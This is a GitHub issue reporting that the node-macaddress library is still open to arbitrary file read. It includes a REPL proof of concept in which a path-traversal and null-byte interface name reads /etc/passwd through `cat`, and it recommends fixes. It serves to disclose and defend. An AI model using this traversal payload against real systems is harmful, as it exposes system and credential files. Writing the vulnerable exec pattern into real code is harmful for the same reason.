This is still vulnerable to arbitrary file read #1

@epet

Description

@q3k originally reported this at https://github.com/scravy/node-macaddress/pull/20

This is still vulnerable to arbitrary file read:

```
> let execFile = require('child_process').execFile;
undefined
> let garbage = function (iface, callback) {
...     execFile("cat", ["/sys/class/net/" + iface + "/address"], function (err, out) {
.....         if (err) {
.......             callback(err, null);
.......             return;
.......         }
.....         callback(null, out.trim().toLowerCase());
.....     });
... };
undefined
> garbage("../../../../etc/passwd\x00", (e, o) => { console.log(o); })
undefined
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:mailing list manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:gnats bug-reporting system (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd time synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd network management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd bus proxy,,,:/run/systemd:/bin/false
node:x:1000:1000::/home/node:/bin/bash
```

I recommend at least using a proper file read function, which will panic on null bytes, and manually filtering out any pathseps from the given iface:

```
> require('fs').readFile('/sys/class/net/../../../../../etc/passwd\x00/address', (e, o) => { console.log(o); })
TypeError [ERR_INVALID_ARG_VALUE]: The argument 'path' must be a string or Uint8Array without null bytes. Received '/sys/class/net/../../../../../etc/passwd\u0000/address'
    at Object.fs.readFile (fs.js:291:3)
```

or even better, using real APIs to access network device information (i.e. Netlink on Linux).
